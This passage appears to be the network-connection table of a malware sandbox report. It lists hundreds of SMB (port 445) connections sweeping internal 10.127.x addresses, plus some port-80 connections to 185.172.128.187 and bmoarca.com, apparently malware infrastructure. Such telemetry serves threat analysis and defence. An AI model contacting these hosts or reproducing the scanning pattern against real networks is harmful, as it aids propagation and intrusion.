| N/A | 10.127.11.80:445 | tcp | |
| N/A | 10.127.11.91:445 | tcp | |
| N/A | 10.127.11.111:445 | tcp | |
| N/A | 10.127.11.102:445 | tcp | |
| N/A | 10.127.11.88:445 | tcp | |
| N/A | 10.127.11.122:445 | tcp | |
| N/A | 10.127.11.109:445 | tcp | |
| N/A | 10.127.11.105:445 | tcp | |
| N/A | 10.127.11.78:445 | tcp | |
| N/A | 10.127.11.116:445 | tcp | |
| N/A | 10.127.11.96:445 | tcp | |
| N/A | 10.127.11.104:445 | tcp | |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| N/A | 10.127.11.99:445 | tcp | |
| N/A | 10.127.11.120:445 | tcp | |
| N/A | 10.127.11.123:445 | tcp | |
| N/A | 10.127.11.71:445 | tcp | |
| N/A | 10.127.11.128:445 | tcp | |
| N/A | 10.127.11.77:445 | tcp | |
| N/A | 10.127.11.100:445 | tcp | |
| N/A | 10.127.11.106:445 | tcp | |
| N/A | 10.127.11.81:445 | tcp | |
| N/A | 10.127.11.83:445 | tcp | |
| N/A | 10.127.11.124:445 | tcp | |
| N/A | 10.127.11.119:445 | tcp | |
| N/A | 10.127.11.126:445 | tcp | |
| N/A | 10.127.11.93:445 | tcp | |
| N/A | 10.127.11.115:445 | tcp | |
| N/A | 10.127.11.118:445 | tcp | |
| N/A | 10.127.11.86:445 | tcp | |
| N/A | 10.127.11.108:445 | tcp | |
| N/A | 10.127.11.110:445 | tcp | |
| N/A | 10.127.11.112:445 | tcp | |
| N/A | 10.127.11.89:445 | tcp | |
| N/A | 10.127.11.103:445 | tcp | |
| N/A | 10.127.11.87:445 | tcp | |
| N/A | 10.127.11.69:445 | tcp | |
| N/A | 10.127.11.117:445 | tcp | |
| N/A | 10.127.11.95:445 | tcp | |
| N/A | 10.127.11.114:445 | tcp | |
| N/A | 10.127.11.98:445 | tcp | |
| TR | 195.16.74.230:80 | bmoarca.com | tcp |
| N/A | 10.127.11.131:445 | tcp | |
| N/A | 10.127.11.143:445 | tcp | |
| N/A | 10.127.11.139:445 | tcp | |
| N/A | 10.127.11.137:445 | tcp | |
| N/A | 10.127.11.138:445 | tcp | |
| N/A | 10.127.11.141:445 | tcp | |
| N/A | 10.127.11.149:445 | tcp | |
| N/A | 10.127.11.133:445 | tcp | |
| N/A | 10.127.11.145:445 | tcp | |
| N/A | 10.127.11.146:445 | tcp | |
| N/A | 10.127.11.134:445 | tcp | |
| N/A | 10.127.11.148:445 | tcp | |
| N/A | 10.127.11.140:445 | tcp | |
| N/A | 10.127.11.150:445 | tcp | |
| N/A | 10.127.11.135:445 | tcp | |
| N/A | 10.127.11.144:445 | tcp | |
| N/A | 10.127.11.136:445 | tcp | |
| N/A | 10.127.11.142:445 | tcp | |
| N/A | 10.127.11.132:445 | tcp | |
| N/A | 10.127.11.147:445 | tcp | |
| N/A | 10.127.11.158:445 | tcp | |
| N/A | 10.127.11.175:445 | tcp | |
| N/A | 10.127.11.155:445 | tcp | |
| N/A | 10.127.11.162:445 | tcp | |
| N/A | 10.127.11.177:445 | tcp | |
| N/A | 10.127.11.154:445 | tcp | |
| N/A | 10.127.11.152:445 | tcp | |
| N/A | 10.127.11.169:445 | tcp | |
| N/A | 10.127.11.167:445 | tcp | |
| N/A | 10.127.11.171:445 | tcp | |
| N/A | 10.127.11.181:445 | tcp | |
| N/A | 10.127.11.185:445 | tcp | |
| N/A | 10.127.11.166:445 | tcp | |
| N/A | 10.127.11.178:445 | tcp | |
| N/A | 10.127.11.179:445 | tcp | |
| N/A | 10.127.11.156:445 | tcp | |
| N/A | 10.127.11.180:445 | tcp | |
| N/A | 10.127.11.192:445 | tcp | |
| N/A | 10.127.11.187:445 | tcp | |
| N/A | 10.127.11.172:445 | tcp | |
| N/A | 10.127.11.182:445 | tcp | |
| N/A | 10.127.11.183:445 | tcp | |
| N/A | 10.127.11.186:445 | tcp | |
| N/A | 10.127.11.159:445 | tcp | |
| N/A | 10.127.11.164:445 | tcp | |
| N/A | 10.127.11.165:445 | tcp | |
| N/A | 10.127.11.184:445 | tcp | |
| N/A | 10.127.11.190:445 | tcp | |
| N/A | 10.127.11.160:445 | tcp | |
| N/A | 10.127.11.188:445 | tcp | |
| N/A | 10.127.11.151:445 | tcp | |
| N/A | 10.127.11.176:445 | tcp | |
| N/A | 10.127.11.191:445 | tcp | |
| N/A | 10.127.11.153:445 | tcp | |
| N/A | 10.127.11.168:445 | tcp | |
| N/A | 10.127.11.170:445 | tcp | |
| N/A | 10.127.11.189:445 | tcp | |
| N/A | 10.127.11.157:445 | tcp | |
| N/A | 10.127.11.163:445 | tcp | |
| N/A | 10.127.11.161:445 | tcp | |
| N/A | 10.127.11.174:445 | tcp | |
| N/A | 10.127.11.193:445 | tcp | |
| TR | 195.16.74.230:80 | bmoarca.com | tcp |
| N/A | 10.127.11.173:445 | tcp | |
| N/A | 10.127.11.194:445 | tcp | |
| N/A | 10.127.11.195:445 | tcp | |
| N/A | 10.127.11.198:445 | tcp | |
| N/A | 10.127.11.205:445 | tcp | |
| N/A | 10.127.11.206:445 | tcp | |
| N/A | 10.127.11.202:445 | tcp | |
| N/A | 10.127.11.209:445 | tcp | |
| N/A | 10.127.11.196:445 | tcp | |
| N/A | 10.127.11.211:445 | tcp | |
| N/A | 10.127.11.213:445 | tcp | |
| N/A | 10.127.11.201:445 | tcp | |
| N/A | 10.127.11.200:445 | tcp | |
| N/A | 10.127.11.210:445 | tcp | |
| N/A | 10.127.11.212:445 | tcp | |
| N/A | 10.127.11.203:445 | tcp | |
| N/A | 10.127.11.208:445 | tcp | |
| N/A | 10.127.11.199:445 | tcp | |
| N/A | 10.127.11.204:445 | tcp | |
| N/A | 10.127.11.197:445 | tcp | |
| N/A | 10.127.11.207:445 | tcp | |
| N/A | 10.127.11.222:445 | tcp | |
| N/A | 10.127.11.224:445 | tcp | |
| N/A | 10.127.11.214:445 | tcp | |
| N/A | 10.127.11.220:445 | tcp | |
| N/A | 10.127.11.216:445 | tcp | |
| N/A | 10.127.11.218:445 | tcp | |
| N/A | 10.127.11.219:445 | tcp | |
| N/A | 10.127.11.223:445 | tcp | |
| N/A | 10.127.11.215:445 | tcp | |
| N/A | 10.127.11.221:445 | tcp | |
| N/A | 10.127.11.229:445 | tcp | |
| N/A | 10.127.11.217:445 | tcp | |
| N/A | 10.127.11.228:445 | tcp | |
| N/A | 10.127.11.225:445 | tcp | |
| N/A | 10.127.11.226:445 | tcp | |
| N/A | 10.127.11.227:445 | tcp | |
| N/A | 10.127.11.230:445 | tcp | |
| N/A | 10.127.11.233:445 | tcp | |
| N/A | 10.127.11.239:445 | tcp | |
| N/A | 10.127.11.237:445 | tcp | |
| N/A | 10.127.11.231:445 | tcp | |
| N/A | 10.127.11.234:445 | tcp | |
| N/A | 10.127.11.232:445 | tcp | |
| N/A | 10.127.11.247:445 | tcp | |
| N/A | 10.127.11.235:445 | tcp | |
| N/A | 10.127.11.246:445 | tcp | |
| N/A | 10.127.11.236:445 | tcp | |
| N/A | 10.127.11.238:445 | tcp | |
| N/A | 10.127.11.240:445 | tcp | |
| N/A | 10.127.11.242:445 | tcp | |
| N/A | 10.127.11.248:445 | tcp | |
| N/A | 10.127.11.251:445 | tcp | |
| N/A | 10.127.11.243:445 | tcp | |
| N/A | 10.127.11.245:445 | tcp | |
| N/A | 10.127.11.241:445 | tcp | |
| N/A | 10.127.11.250:445 | tcp | |
| N/A | 10.127.11.253:445 | tcp | |
| N/A | 10.127.12.1:445 | tcp | |
| N/A | 10.127.11.255:445 | tcp | |
| N/A | 10.127.12.0:445 | tcp | |
| N/A | 10.127.11.249:445 | tcp | |
| N/A | 10.127.12.3:445 | tcp | |
| N/A | 10.127.11.244:445 | tcp | |
| N/A | 10.127.11.252:445 | tcp | |
| N/A | 10.127.11.254:445 | tcp | |
| N/A | 10.127.12.4:445 | tcp | |
| N/A | 10.127.12.2:445 | tcp | |
| N/A | 10.127.12.6:445 | tcp | |
| N/A | 10.127.12.5:445 | tcp | |
| N/A | 10.127.12.7:445 | tcp | |
| N/A | 10.127.12.19:445 | tcp | |
| N/A | 10.127.12.18:445 | tcp | |
| N/A | 10.127.12.12:445 | tcp | |
| N/A | 10.127.12.21:445 | tcp | |
| N/A | 10.127.12.11:445 | tcp | |
| N/A | 10.127.12.15:445 | tcp | |
| N/A | 10.127.12.10:445 | tcp | |
| N/A | 10.127.12.22:445 | tcp | |
| N/A | 10.127.12.16:445 | tcp | |
| N/A | 10.127.12.17:445 | tcp | |
| N/A | 10.127.12.8:445 | tcp | |
| N/A | 10.127.12.13:445 | tcp | |
| N/A | 10.127.12.20:445 | tcp | |
| N/A | 10.127.12.14:445 | tcp | |
| N/A | 10.127.12.9:445 | tcp | |
| N/A | 10.127.12.28:445 | tcp | |
| N/A | 10.127.12.38:445 | tcp | |
| N/A | 10.127.12.39:445 | tcp | |
| N/A | 10.127.12.23:445 | tcp | |
| N/A | 10.127.12.32:445 | tcp | |
| N/A | 10.127.12.24:445 | tcp | |
| N/A | 10.127.12.31:445 | tcp | |
| N/A | 10.127.12.34:445 | tcp | |
| N/A | 10.127.12.46:445 | tcp | |
| N/A | 10.127.12.45:445 | tcp | |
| N/A | 10.127.12.47:445 | tcp | |
| N/A | 10.127.12.26:445 | tcp | |
| N/A | 10.127.12.35:445 | tcp | |
| N/A | 10.127.12.29:445 | tcp | |
| N/A | 10.127.12.37:445 | tcp | |
| N/A | 10.127.12.30:445 | tcp | |
| N/A | 10.127.12.33:445 | tcp | |
| N/A | 10.127.12.40:445 | tcp | |
| N/A | 10.127.12.25:445 | tcp | |
| N/A | 10.127.12.27:445 | tcp | |
| N/A | 10.127.12.36:445 | tcp | |
| N/A | 10.127.12.48:445 | tcp | |
| N/A | 10.127.12.41:445 | tcp | |
| N/A | 10.127.12.42:445 | tcp | |
| N/A | 10.127.12.44:445 | tcp | |
| N/A | 10.127.12.52:445 | tcp | |
| N/A | 10.127.12.43:445 | tcp | |
| N/A | 10.127.12.54:445 | tcp | |
| N/A | 10.127.12.60:445 | tcp | |
| N/A | 10.127.12.50:445 | tcp | |
| N/A | 10.127.12.58:445 | tcp | |
| N/A | 10.127.12.49:445 | tcp | |
| N/A | 10.127.12.63:445 | tcp | |
| N/A | 10.127.12.56:445 | tcp | |
| N/A | 10.127.12.65:445 | tcp | |
| N/A | 10.127.12.61:445 | tcp | |
| N/A | 10.127.12.62:445 | tcp | |
| N/A | 10.127.12.57:445 | tcp | |
| N/A | 10.127.12.64:445 | tcp | |
| N/A | 10.127.12.53:445 | tcp | |
| N/A | 10.127.12.55:445 | tcp | |
| N/A | 10.127.12.51:445 | tcp | |
| N/A | 10.127.12.59:445 | tcp | |
| N/A | 10.127.12.67:445 | tcp | |
| N/A | 10.127.12.66:445 | tcp | |
| N/A | 10.127.12.81:445 | tcp | |
| N/A | 10.127.12.75:445 | tcp | |
| N/A | 10.127.12.77:445 | tcp | |
| N/A | 10.127.12.84:445 | tcp | |
| N/A | 10.127.12.78:445 | tcp | |
| N/A | 10.127.12.79:445 | tcp | |
| N/A | 10.127.12.80:445 | tcp | |
| N/A | 10.127.12.82:445 | tcp | |
| N/A | 10.127.12.71:445 | tcp | |
| N/A | 10.127.12.73:445 | tcp | |
| N/A | 10.127.12.70:445 | tcp | |
| N/A | 10.127.12.83:445 | tcp | |
| N/A | 10.127.12.68:445 | tcp | |
| N/A | 10.127.12.76:445 | tcp | |
| N/A | 10.127.12.72:445 | tcp | |
| N/A | 10.127.12.74:445 | tcp | |
| N/A | 10.127.12.69:445 | tcp | |
| N/A | 10.127.12.85:445 | tcp | |
| N/A | 10.127.12.86:445 | tcp | |
| N/A | 10.127.12.95:445 | tcp | |
| N/A | 10.127.12.99:445 | tcp | |
| N/A | 10.127.12.93:445 | tcp | |
| N/A | 10.127.12.101:445 | tcp | |
| N/A | 10.127.12.97:445 | tcp | |
| N/A | 10.127.12.87:445 | tcp | |
| N/A | 10.127.12.94:445 | tcp | |
| N/A | 10.127.12.96:445 | tcp | |
| N/A | 10.127.12.104:445 | tcp | |
| N/A | 10.127.12.91:445 | tcp | |
| N/A | 10.127.12.89:445 | tcp | |
| N/A | 10.127.12.103:445 | tcp | |
| N/A | 10.127.12.110:445 | tcp | |
| N/A | 10.127.12.88:445 | tcp | |
| N/A | 10.127.12.92:445 | tcp | |
| N/A | 10.127.12.90:445 | tcp | |
| N/A | 10.127.12.102:445 | tcp | |
| N/A | 10.127.12.108:445 | tcp | |
| N/A | 10.127.12.98:445 | tcp | |
| N/A | 10.127.12.113:445 | tcp | |
| N/A | 10.127.12.105:445 | tcp | |
| N/A | 10.127.12.100:445 | tcp | |
| N/A | 10.127.12.107:445 | tcp | |
| N/A | 10.127.12.106:445 | tcp | |
| N/A | 10.127.12.109:445 | tcp | |
| N/A | 10.127.12.123:445 | tcp | |
| N/A | 10.127.12.121:445 | tcp | |
| N/A | 10.127.12.111:445 | tcp | |
| N/A | 10.127.12.120:445 | tcp | |
| N/A | 10.127.12.112:445 | tcp | |
| N/A | 10.127.12.119:445 | tcp | |
| N/A | 10.127.12.114:445 | tcp | |
| N/A | 10.127.12.116:445 | tcp | |
| N/A | 10.127.12.117:445 | tcp | |
| N/A | 10.127.12.122:445 | tcp | |
| N/A | 10.127.12.115:445 | tcp | |
| N/A | 10.127.12.118:445 | tcp | |
| N/A | 10.127.12.131:445 | tcp | |
| N/A | 10.127.12.124:445 | tcp | |
| N/A | 10.127.12.125:445 | tcp | |
| N/A | 10.127.12.130:445 | tcp | |
| N/A | 10.127.12.127:445 | tcp | |
| N/A | 10.127.12.129:445 | tcp | |
| N/A | 10.127.12.128:445 | tcp | |
| N/A | 10.127.12.132:445 | tcp | |
| N/A | 10.127.12.141:445 | tcp | |
| N/A | 10.127.12.148:445 | tcp | |
| N/A | 10.127.12.140:445 | tcp | |
| N/A | 10.127.12.126:445 | tcp | |
| N/A | 10.127.12.134:445 | tcp | |
| N/A | 10.127.12.144:445 | tcp | |
| N/A | 10.127.12.143:445 | tcp | |
| N/A | 10.127.12.135:445 | tcp | |
| N/A | 10.127.12.136:445 | tcp | |
| N/A | 10.127.12.137:445 | tcp | |
| N/A | 10.127.12.139:445 | tcp | |
| N/A | 10.127.12.133:445 | tcp | |
| N/A | 10.127.12.149:445 | tcp | |
| N/A | 10.127.12.138:445 | tcp | |
| N/A | 10.127.12.145:445 | tcp | |
| N/A | 10.127.12.146:445 | tcp | |
| N/A | 10.127.12.142:445 | tcp | |
| N/A | 10.127.12.147:445 | tcp | |
| N/A | 10.127.12.150:445 | tcp | |
| N/A | 10.127.12.167:445 | tcp | |
| N/A | 10.127.12.153:445 | tcp | |
| N/A | 10.127.12.151:445 | tcp | |
| N/A | 10.127.12.154:445 | tcp | |
| N/A | 10.127.12.158:445 | tcp | |
| N/A | 10.127.12.168:445 | tcp | |
| N/A | 10.127.12.172:445 | tcp | |
| N/A | 10.127.12.164:445 | tcp | |
| N/A | 10.127.12.152:445 | tcp | |
| N/A | 10.127.12.159:445 | tcp | |
| N/A | 10.127.12.174:445 | tcp | |
| N/A | 10.127.12.175:445 | tcp | |
| N/A | 10.127.12.162:445 | tcp | |
| N/A | 10.127.12.155:445 | tcp | |
| N/A | 10.127.12.170:445 | tcp | |
| N/A | 10.127.12.160:445 | tcp | |
| N/A | 10.127.12.163:445 | tcp | |
| N/A | 10.127.12.156:445 | tcp | |
| N/A | 10.127.12.173:445 | tcp | |
| N/A | 10.127.12.166:445 | tcp | |
| N/A | 10.127.12.157:445 | tcp | |
| N/A | 10.127.12.169:445 | tcp | |
| N/A | 10.127.12.177:445 | tcp | |
| N/A | 10.127.12.165:445 | tcp | |
| N/A | 10.127.12.161:445 | tcp | |
| N/A | 10.127.12.171:445 | tcp | |
| N/A | 10.127.12.178:445 | tcp | |
| N/A | 10.127.12.181:445 | tcp | |
| N/A | 10.127.12.176:445 | tcp | |
| N/A | 10.127.12.184:445 | tcp | |
| N/A | 10.127.12.193:445 | tcp | |
| N/A | 10.127.12.194:445 | tcp | |
| N/A | 10.127.12.192:445 | tcp | |
| N/A | 10.127.12.191:445 | tcp | |
| N/A | 10.127.12.189:445 | tcp | |
| N/A | 10.127.12.186:445 | tcp | |
| N/A | 10.127.12.197:445 | tcp | |
| N/A | 10.127.12.190:445 | tcp | |
| N/A | 10.127.12.200:445 | tcp | |
| N/A | 10.127.12.195:445 | tcp | |
| N/A | 10.127.12.180:445 | tcp | |
| N/A | 10.127.12.188:445 | tcp | |
| N/A | 10.127.12.211:445 | tcp | |
| N/A | 10.127.12.198:445 | tcp | |
| N/A | 10.127.12.202:445 | tcp | |
| N/A | 10.127.12.182:445 | tcp | |
| N/A | 10.127.12.196:445 | tcp | |
| N/A | 10.127.12.208:445 | tcp | |
| N/A | 10.127.12.207:445 | tcp | |
| N/A | 10.127.12.187:445 | tcp | |
| N/A | 10.127.12.209:445 | tcp | |
| N/A | 10.127.12.210:445 | tcp | |
| N/A | 10.127.12.183:445 | tcp | |
| N/A | 10.127.12.212:445 | tcp | |
| N/A | 10.127.12.179:445 | tcp | |
| N/A | 10.127.12.204:445 | tcp | |
| N/A | 10.127.12.205:445 | tcp | |
| N/A | 10.127.12.201:445 | tcp | |
| N/A | 10.127.12.185:445 | tcp | |
| N/A | 10.127.12.199:445 | tcp | |
| N/A | 10.127.12.206:445 | tcp | |
| N/A | 10.127.12.213:445 | tcp | |
| N/A | 10.127.12.203:445 | tcp | |
| N/A | 10.127.12.216:445 | tcp | |
| N/A | 10.127.12.221:445 | tcp | |
| N/A | 10.127.12.222:445 | tcp | |
| N/A | 10.127.12.223:445 | tcp | |
| N/A | 10.127.12.217:445 | tcp | |
| N/A | 10.127.12.218:445 | tcp | |
| N/A | 10.127.12.220:445 | tcp | |
| N/A | 10.127.12.224:445 | tcp | |
| N/A | 10.127.12.227:445 | tcp | |
| N/A | 10.127.12.232:445 | tcp | |
| N/A | 10.127.12.228:445 | tcp | |
| N/A | 10.127.12.215:445 | tcp | |
| N/A | 10.127.12.219:445 | tcp | |
| N/A | 10.127.12.239:445 | tcp | |
| N/A | 10.127.12.234:445 | tcp | |
| N/A | 10.127.12.225:445 | tcp | |
| N/A | 10.127.12.214:445 | tcp | |
| N/A | 10.127.12.233:445 | tcp | |
| N/A | 10.127.12.229:445 | tcp | |
| N/A | 10.127.12.226:445 | tcp | |
| N/A | 10.127.12.230:445 | tcp | |
| N/A | 10.127.12.231:445 | tcp | |
| N/A | 10.127.12.236:445 | tcp | |
| N/A | 10.127.12.238:445 | tcp | |
| N/A | 10.127.12.235:445 | tcp | |
| N/A | 10.127.12.237:445 | tcp | |
| N/A | 10.127.12.250:445 | tcp | |
| N/A | 10.127.12.240:445 | tcp | |
| N/A | 10.127.12.244:445 | tcp | |
| N/A | 10.127.12.242:445 | tcp | |
| N/A | 10.127.12.241:445 | tcp | |
| N/A | 10.127.12.248:445 | tcp | |
| N/A | 10.127.12.243:445 | tcp | |
| N/A | 10.127.12.251:445 | tcp | |
| N/A | 10.127.12.246:445 | tcp | |
| N/A | 10.127.12.245:445 | tcp | |
| N/A | 10.127.12.249:445 | tcp | |
| N/A | 10.127.12.247:445 | tcp | |
| N/A | 10.127.12.252:445 | tcp | |
| N/A | 10.127.13.4:445 | tcp | |
| N/A | 10.127.13.12:445 | tcp | |
| N/A | 10.127.13.10:445 | tcp | |
| N/A | 10.127.13.9:445 | tcp | |
| N/A | 10.127.13.1:445 | tcp | |
| N/A | 10.127.13.8:445 | tcp | |
| N/A | 10.127.13.18:445 | tcp | |
| N/A | 10.127.13.19:445 | tcp | |
| N/A | 10.127.13.5:445 | tcp | |
| N/A | 10.127.13.20:445 | tcp | |
| N/A | 10.127.13.17:445 | tcp | |
| N/A | 10.127.13.16:445 | tcp | |
| N/A | 10.127.12.253:445 | tcp | |
| N/A | 10.127.13.21:445 | tcp | |
| N/A | 10.127.13.15:445 | tcp | |
| N/A | 10.127.13.7:445 | tcp | |
| N/A | 10.127.12.254:445 | tcp | |
| N/A | 10.127.13.14:445 | tcp | |
| N/A | 10.127.12.255:445 | tcp | |
| N/A | 10.127.13.13:445 | tcp | |
| N/A | 10.127.13.3:445 | tcp | |
| N/A | 10.127.13.6:445 | tcp | |
| N/A | 10.127.13.0:445 | tcp | |
| N/A | 10.127.13.2:445 | tcp | |
| N/A | 10.127.13.11:445 | tcp | |
| N/A | 10.127.13.30:445 | tcp | |
| N/A | 10.127.13.27:445 | tcp | |
| N/A | 10.127.13.24:445 | tcp | |
| N/A | 10.127.13.29:445 | tcp | |
| N/A | 10.127.13.33:445 | tcp | |
| N/A | 10.127.13.34:445 | tcp | |
| N/A | 10.127.13.23:445 | tcp | |
| N/A | 10.127.13.36:445 | tcp | |
| N/A | 10.127.13.37:445 | tcp | |
| N/A | 10.127.13.25:445 | tcp | |
| N/A | 10.127.13.39:445 | tcp | |
| N/A | 10.127.13.44:445 | tcp | |
| N/A | 10.127.13.45:445 | tcp | |
| N/A | 10.127.13.40:445 | tcp | |
| N/A | 10.127.13.32:445 | tcp | |
| N/A | 10.127.13.38:445 | tcp | |
| N/A | 10.127.13.22:445 | tcp | |
| N/A | 10.127.13.41:445 | tcp | |
| N/A | 10.127.13.31:445 | tcp | |
| N/A | 10.127.13.26:445 | tcp | |
| N/A | 10.127.13.46:445 | tcp | |
| N/A | 10.127.13.35:445 | tcp | |
| N/A | 10.127.13.28:445 | tcp | |
| N/A | 10.127.13.47:445 | tcp | |
| N/A | 10.127.13.42:445 | tcp | |
| N/A | 10.127.13.43:445 | tcp | |
| N/A | 10.127.13.48:445 | tcp | |
| N/A | 10.127.13.53:445 | tcp | |
| N/A | 10.127.13.56:445 | tcp | |
| N/A | 10.127.13.50:445 | tcp | |
| N/A | 10.127.13.49:445 | tcp | |
| N/A | 10.127.13.51:445 | tcp | |
| N/A | 10.127.13.55:445 | tcp | |
| N/A | 10.127.13.59:445 | tcp | |
| N/A | 10.127.13.57:445 | tcp | |
| N/A | 10.127.13.54:445 | tcp | |
| N/A | 10.127.13.58:445 | tcp | |
| N/A | 10.127.13.60:445 | tcp | |
| N/A | 10.127.13.52:445 | tcp | |
| N/A | 10.127.13.76:445 | tcp | |
| N/A | 10.127.13.61:445 | tcp | |
| N/A | 10.127.13.62:445 | tcp | |
| N/A | 10.127.13.67:445 | tcp | |
| N/A | 10.127.13.68:445 | tcp | |
| N/A | 10.127.13.69:445 | tcp | |
| N/A | 10.127.13.85:445 | tcp | |
| N/A | 10.127.13.65:445 | tcp | |
| N/A | 10.127.13.73:445 | tcp | |
| N/A | 10.127.13.64:445 | tcp | |
| N/A | 10.127.13.63:445 | tcp | |
| N/A | 10.127.13.77:445 | tcp | |
| N/A | 10.127.13.79:445 | tcp | |
| N/A | 10.127.13.71:445 | tcp | |
| N/A | 10.127.13.70:445 | tcp | |
| N/A | 10.127.13.74:445 | tcp | |
| N/A | 10.127.13.84:445 | tcp | |
| N/A | 10.127.13.81:445 | tcp | |
| N/A | 10.127.13.66:445 | tcp | |
| N/A | 10.127.13.75:445 | tcp | |
| N/A | 10.127.13.80:445 | tcp | |
| N/A | 10.127.13.83:445 | tcp | |
| N/A | 10.127.13.72:445 | tcp | |
| N/A | 10.127.13.78:445 | tcp | |
| N/A | 10.127.13.82:445 | tcp | |
| N/A | 10.127.13.97:445 | tcp | |
| N/A | 10.127.13.91:445 | tcp | |
| N/A | 10.127.13.105:445 | tcp | |
| N/A | 10.127.13.98:445 | tcp | |
| N/A | 10.127.13.93:445 | tcp | |
| N/A | 10.127.13.96:445 | tcp | |
| N/A | 10.127.13.106:445 | tcp | |
| N/A | 10.127.13.101:445 | tcp | |
| N/A | 10.127.13.110:445 | tcp | |
| N/A | 10.127.13.99:445 | tcp | |
| N/A | 10.127.13.94:445 | tcp | |
| N/A | 10.127.13.87:445 | tcp | |
| N/A | 10.127.13.102:445 | tcp | |
| N/A | 10.127.13.92:445 | tcp | |
| N/A | 10.127.13.109:445 | tcp | |
| N/A | 10.127.13.108:445 | tcp | |
| N/A | 10.127.13.104:445 | tcp | |
| N/A | 10.127.13.111:445 | tcp | |
| N/A | 10.127.13.90:445 | tcp | |
| N/A | 10.127.13.86:445 | tcp | |
| N/A | 10.127.13.95:445 | tcp | |
| N/A | 10.127.13.88:445 | tcp | |
| N/A | 10.127.13.89:445 | tcp | |
| N/A | 10.127.13.103:445 | tcp | |
| N/A | 10.127.13.100:445 | tcp | |
| N/A | 10.127.13.107:445 | tcp | |
| N/A | 10.127.13.112:445 | tcp | |
| N/A | 10.127.13.114:445 | tcp | |
| N/A | 10.127.13.113:445 | tcp | |
| N/A | 10.127.13.119:445 | tcp | |
| N/A | 10.127.13.115:445 | tcp | |
| N/A | 10.127.13.122:445 | tcp | |
| N/A | 10.127.13.123:445 | tcp | |
| N/A | 10.127.13.124:445 | tcp | |
| N/A | 10.127.13.117:445 | tcp | |
| N/A | 10.127.13.120:445 | tcp | |
| N/A | 10.127.13.116:445 | tcp | |
| N/A | 10.127.13.118:445 | tcp | |
| N/A | 10.127.13.121:445 | tcp | |
| N/A | 10.127.13.130:445 | tcp | |
| N/A | 10.127.13.125:445 | tcp | |
| N/A | 10.127.13.128:445 | tcp | |
| N/A | 10.127.13.149:445 | tcp | |
| N/A | 10.127.13.148:445 | tcp | |
| N/A | 10.127.13.136:445 | tcp | |
| N/A | 10.127.13.138:445 | tcp | |
| N/A | 10.127.13.145:445 | tcp | |
| N/A | 10.127.13.161:445 | tcp | |
| N/A | 10.127.13.160:445 | tcp | |
| N/A | 10.127.13.158:445 | tcp | |
| N/A | 10.127.13.134:445 | tcp | |
| N/A | 10.127.13.126:445 | tcp | |
| N/A | 10.127.13.139:445 | tcp | |
| N/A | 10.127.13.153:445 | tcp | |
| N/A | 10.127.13.157:445 | tcp | |
| N/A | 10.127.13.133:445 | tcp | |
| N/A | 10.127.13.144:445 | tcp | |
| N/A | 10.127.13.169:445 | tcp | |
| N/A | 10.127.13.131:445 | tcp | |
| N/A | 10.127.13.152:445 | tcp | |
| N/A | 10.127.13.129:445 | tcp | |
| N/A | 10.127.13.156:445 | tcp | |
| N/A | 10.127.13.147:445 | tcp | |
| N/A | 10.127.13.150:445 | tcp | |
| N/A | 10.127.13.168:445 | tcp | |
| N/A | 10.127.13.137:445 | tcp | |
| N/A | 10.127.13.141:445 | tcp | |
| N/A | 10.127.13.140:445 | tcp | |
| N/A | 10.127.13.143:445 | tcp | |
| N/A | 10.127.13.154:445 | tcp | |
| N/A | 10.127.13.135:445 | tcp | |
| N/A | 10.127.13.132:445 | tcp | |
| N/A | 10.127.13.142:445 | tcp | |
| N/A | 10.127.13.146:445 | tcp | |
| N/A | 10.127.13.167:445 | tcp | |
| N/A | 10.127.13.127:445 | tcp | |
| N/A | 10.127.13.164:445 | tcp | |
| N/A | 10.127.13.151:445 | tcp | |
| N/A | 10.127.13.163:445 | tcp | |
| N/A | 10.127.13.166:445 | tcp | |
| N/A | 10.127.13.155:445 | tcp | |
| N/A | 10.127.13.165:445 | tcp | |
| N/A | 10.127.13.162:445 | tcp | |
| N/A | 10.127.13.159:445 | tcp | |
| N/A | 10.127.13.174:445 | tcp | |
| N/A | 10.127.13.175:445 | tcp | |
| N/A | 10.127.13.172:445 | tcp | |
| N/A | 10.127.13.173:445 | tcp | |
| N/A | 10.127.13.170:445 | tcp | |
| N/A | 10.127.13.171:445 | tcp | |
| N/A | 10.127.13.178:445 | tcp | |
| N/A | 10.127.13.177:445 | tcp | |
| N/A | 10.127.13.187:445 | tcp | |
| N/A | 10.127.13.180:445 | tcp | |
| N/A | 10.127.13.182:445 | tcp | |
| N/A | 10.127.13.188:445 | tcp | |
| N/A | 10.127.13.185:445 | tcp | |
| N/A | 10.127.13.179:445 | tcp | |
| N/A | 10.127.13.181:445 | tcp | |
| N/A | 10.127.13.176:445 | tcp | |
| N/A | 10.127.13.184:445 | tcp | |
| N/A | 10.127.13.186:445 | tcp | |
| N/A | 10.127.13.183:445 | tcp | |
| N/A | 10.127.13.213:445 | tcp | |
| N/A | 10.127.13.207:445 | tcp | |
| N/A | 10.127.13.200:445 | tcp | |
| N/A | 10.127.13.208:445 | tcp | |
| N/A | 10.127.13.211:445 | tcp | |
| N/A | 10.127.13.194:445 | tcp | |
| N/A | 10.127.13.190:445 | tcp | |
| N/A | 10.127.13.209:445 | tcp | |
| N/A | 10.127.13.202:445 | tcp | |
| N/A | 10.127.13.205:445 | tcp | |
| N/A | 10.127.13.206:445 | tcp | |
| N/A | 10.127.13.191:445 | tcp | |
| N/A | 10.127.13.195:445 | tcp | |
| N/A | 10.127.13.233:445 | tcp | |
| N/A | 10.127.13.216:445 | tcp | |
| N/A | 10.127.13.223:445 | tcp | |
| N/A | 10.127.13.227:445 | tcp | |
| N/A | 10.127.13.230:445 | tcp | |
| N/A | 10.127.13.199:445 | tcp | |
| N/A | 10.127.13.203:445 | tcp | |
| N/A | 10.127.13.193:445 | tcp | |
| N/A | 10.127.13.201:445 | tcp | |
| N/A | 10.127.13.218:445 | tcp | |
| N/A | 10.127.13.189:445 | tcp | |
| N/A | 10.127.13.210:445 | tcp | |
| N/A | 10.127.13.196:445 | tcp | |
| N/A | 10.127.13.197:445 | tcp | |
| N/A | 10.127.13.192:445 | tcp | |
| N/A | 10.127.13.217:445 | tcp | |
| N/A | 10.127.13.198:445 | tcp | |
| N/A | 10.127.13.204:445 | tcp | |
| N/A | 10.127.13.212:445 | tcp | |
| N/A | 10.127.13.231:445 | tcp | |
| N/A | 10.127.13.225:445 | tcp | |
| N/A | 10.127.13.219:445 | tcp | |
| N/A | 10.127.13.224:445 | tcp | |
| N/A | 10.127.13.226:445 | tcp | |
| N/A | 10.127.13.215:445 | tcp | |
